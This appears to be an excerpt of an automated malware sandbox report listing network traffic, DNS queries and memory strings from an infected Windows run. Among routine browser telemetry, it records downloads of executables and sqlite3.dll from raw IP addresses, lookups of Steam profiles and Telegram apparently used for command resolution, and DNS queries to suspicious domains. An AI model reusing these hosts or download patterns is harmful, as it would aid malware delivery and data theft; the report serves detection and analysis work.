Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.8704366d527afd4c1c1c.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5ou6c0RgLWwGr1aRJJZ0WPNyiPBYgIpWfykvhKW-6BLzMRsp9ykw5f6ReBQmPpO6WB9pcSJPfykLTHDjYAxlKa5bf72z8tHS5eXuTavTP1h4WZBjSs/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=29535F340DD9650527FA4A840C536462; _EDGE_S=F=1&SID=2114F98B268160EE3509EC3B27896140; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /b?rn=1742043403500&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=29535F340DD9650527FA4A840C536462&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1742043403499&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=ccc4bf56be6d436ab6d7a035d19c6d0a&activityId=ccc4bf56be6d436ab6d7a035d19c6d0a&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=29535F340DD9650527FA4A840C536462; _EDGE_S=F=1&SID=2114F98B268160EE3509EC3B27896140; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /b2?rn=1742043403500&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=29535F340DD9650527FA4A840C536462&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1EB7c7a1a88eff887969e591742043406; XID=1EB7c7a1a88eff887969e591742043406
Source: global traffic HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.3sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 300sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=CCC4BF56BE6D436AB6D7A035D19C6D0A.RefC=2025-03-15T12:56:38Z; USRLOC=; MUID=29535F340DD9650527FA4A840C536462; MUIDB=29535F340DD9650527FA4A840C536462; _EDGE_S=F=1&SID=2114F98B268160EE3509EC3B27896140; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=d11e8053-0781-46dc-b56f-004b8fbaa67c; ai_session=XmAf0zxGGBMehPD9/NB2/G|1742043403495|1742043403495; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=CCC4BF56BE6D436AB6D7A035D19C6D0A.RefC=2025-03-15T12:56:38Z
Source: global traffic HTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":17,"imageId":"BB1msyCB","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=CCC4BF56BE6D436AB6D7A035D19C6D0A.RefC=2025-03-15T12:56:38Z; USRLOC=; MUID=29535F340DD9650527FA4A840C536462; MUIDB=29535F340DD9650527FA4A840C536462; _EDGE_S=F=1&SID=2114F98B268160EE3509EC3B27896140; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=d11e8053-0781-46dc-b56f-004b8fbaa67c; ai_session=XmAf0zxGGBMehPD9/NB2/G|1742043403495|1742043403495; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=CCC4BF56BE6D436AB6D7A035D19C6D0A.RefC=2025-03-15T12:56:38Z
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1742043403499&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=ccc4bf56be6d436ab6d7a035d19c6d0a&activityId=ccc4bf56be6d436ab6d7a035d19c6d0a&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=C3319B6DA1B64795A2370737BB571854&MUID=29535F340DD9650527FA4A840C536462 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=29535F340DD9650527FA4A840C536462; _EDGE_S=F=1&SID=2114F98B268160EE3509EC3B27896140; _EDGE_V=1; SM=T; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
Source: global traffic HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiJo8sBCIWgzQEI9s/OAQiA1s4BCNLgzgEIr+TOAQji5M4BCIvlzgE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiJo8sBCIWgzQEI9s/OAQiA1s4BCNLgzgEIr+TOAQji5M4BCIvlzgE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /l9543.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0Host: 77.90.153.244Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /s9471.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0Host: 77.90.153.244Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 77.90.153.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sss81242.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0Host: 77.90.153.244Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /a07daa7aeaf96e14/sqlite3.dll HTTP/1.1Host: 77.90.153.241Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /l9543.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3Host: 77.90.153.244Cache-Control: no-cache
Source: cf7eb033-6898-4a6c-b2e2-4fa8fad5b878.tmp.18.dr String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.1501980007.0000627400A68000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2026567177.00000E7C00866000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000003.1415858311.00006274014C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1415881337.0000627400318000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1415905723.00006274014E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
Source: chrome.exe, 00000009.00000003.1415858311.00006274014C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1415881337.0000627400318000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1415905723.00006274014E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
Source: chrome.exe, 00000009.00000002.1501980007.0000627400A68000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2026567177.00000E7C00866000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: MSBuild.exe, 0000001D.00000002.1868398435.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.1504050044.00006274010E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1504601388.0000627401280000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2120059159.00000E7C010B8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.1501980007.0000627400A68000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2026567177.00000E7C00866000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.1499117654.00006274001E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1504050044.00006274010E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1504601388.0000627401280000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.1501980007.0000627400A68000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2026567177.00000E7C00866000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.1506680941.000062740179C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1504020347.00006274010CC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1503811327.0000627401044000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.1503811327.0000627401044000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlndler equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.1504020347.00006274010CC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmloot ca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000025.00000002.2119541690.00000E7C01078000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmltor equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.1504050044.00006274010E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2124020987.00000E7C01360000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: t.p.formaxprime.co.uk
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic DNS traffic detected: DNS query: c.msn.com
Source: global traffic DNS traffic detected: DNS query: assets.msn.com
Source: global traffic DNS traffic detected: DNS query: api.msn.com
Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: citywand.live
Source: global traffic DNS traffic detected: DNS query: crosshairc.life
Source: global traffic DNS traffic detected: DNS query: mrodularmall.top
Source: global traffic DNS traffic detected: DNS query: jowinjoinery.icu
Source: global traffic DNS traffic detected: DNS query: legenassedk.top
Source: global traffic DNS traffic detected: DNS query: htardwarehu.icu
Source: global traffic DNS traffic detected: DNS query: cjlaspcorne.icu
Source: global traffic DNS traffic detected: DNS query: bugildbett.top
Source: global traffic DNS traffic detected: DNS query: weaponrywo.digital
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: guntac.bet
Source: global traffic DNS traffic detected: DNS query: c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com
